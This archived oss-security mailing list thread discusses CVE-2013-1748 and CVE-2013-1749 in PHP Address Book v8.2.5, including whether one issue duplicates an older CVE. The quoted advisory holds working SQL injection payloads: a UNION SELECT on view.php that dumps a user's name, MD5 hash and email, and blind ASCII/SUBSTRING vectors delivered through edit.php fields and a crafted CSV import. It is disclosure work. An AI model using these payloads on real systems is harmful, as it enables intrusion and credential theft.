Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 10 May 2013 17:14:33 +0800
From: Doraemon Sk8ers <doraemon.sk8ers@...il.com>
To: Henri Salo <henri@...v.fi>
Cc: oss-security@...ts.openwall.com
Subject: Re: Multiple vulnerabilities in PHP Address Book v8.2.5

Hi Henri,

CVE-2013-1748 #1 does seems to be similar with CVE-2008-2565, the only
difference is the increase in the number of columns
To our knowledge, CVE-2013-1748 #2 and #3 has not been published before

Regards
Team Doraemon.Sk8ers
http://doraemondroids.wikispaces.com/

On Wed, Apr 17, 2013 at 10:27 PM, Henri Salo <henri@...v.fi> wrote:

> Hello,
>
> I believe CVE-2013-1748 #1 is duplicate of CVE-2008-2565 as per OSVDB[1].
> As far
> as I know most of security vulnerabilities reported to this project
> haven't been
> fixed. Haven't verified this detail. What php-addressbook project would
> need is
> patches to fix all issues you can find. Finding vulnerabilities is easy -
> fixing in upstream is not. I can help you if you are willing to write
> patches.
> Takes hour or two :)
>
> 1: http://osvdb.org/45965
>
> ---
> Henri Salo
>
> On Wed, Apr 17, 2013 at 11:14:27AM +0800, Doraemon Sk8ers wrote:
> > There is a SQL injection vulnerability and reflected XSS in Simple PHP
> > Address Book v8.2.5.
> > The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748
> > (SQLi) & CVE-2013-1749 (XSS) respectively.
> >
> > # Software Link: http://sourceforge.net/projects/php-addressbook/
> > # Version: v8.2.5
> > # Tested on: v8.2.5
> > # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS)
> >
> >
> > Details:
> > -----------
> > *
> > *
> > *CVE-2013-1748 (SQLi)*
> >
> > We have discovered 3 pages which are prone to SQL Injection
> >
> > 1.    /view.php?id=1
> > The "id" parameter is vulnerable to SQL injection
> > Injection Vector:
> >       /view.php?id=-1' union select '1','2','3','4',(select username from
> > users limit 1),(select md5_pass from users limit 1),(select email from
> > users limit
> 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41
> > This injection vector will dump the username, md5 password and email
> > of the first user in the user table onto the page itself
> >
> > 2.    /edit.php
> > Most of the fields on this page are vulnerable to SQL injection
> > Injection Vector (inclusive of quotes):
> >       '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1),
> 1)))+'
> > This will dump out the ASCII value of the 1st character of the md5
> > password of the first user
> >
> > 3.    /import.php
> > The same injection vulnerability as Point 2 above is also present in
> > the import function
> > Using the same injection vector, saved in a csv file
> >       '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1),
> 1)))+'
> > Similarly, this injection vector will dump out the ASCII value of the
> > 1st character of the md5 password of the first user
> >
> > The original input csv sample looks like this
> > "Last name";"First
> > name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> > home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> > "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city,
> > Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3
> > 456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street,
> > 1234 secondcity, secondcountry";"+5 678 910 111"
> >
> > The injected csv with the injected vectors looks like this
> > "Last name";"First
> > name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> > home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> > "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT
> > md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456
> > 789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567
> > 897 011";"first.last@...l2.net";"second street, 1234 secondcity,
> > secondcountry";"+5 678 910 111"
> <snip>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.10 (GNU/Linux)
>
> iEYEARECAAYFAlFusWEACgkQXf6hBi6kbk+zewCgv1NZPnNJ+oullyyNGCZIiZDE
> yVgAn0B3sIciT45IzHOQgAhZpEl+ul0p
> =c0zL
> -----END PGP SIGNATURE-----
>
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.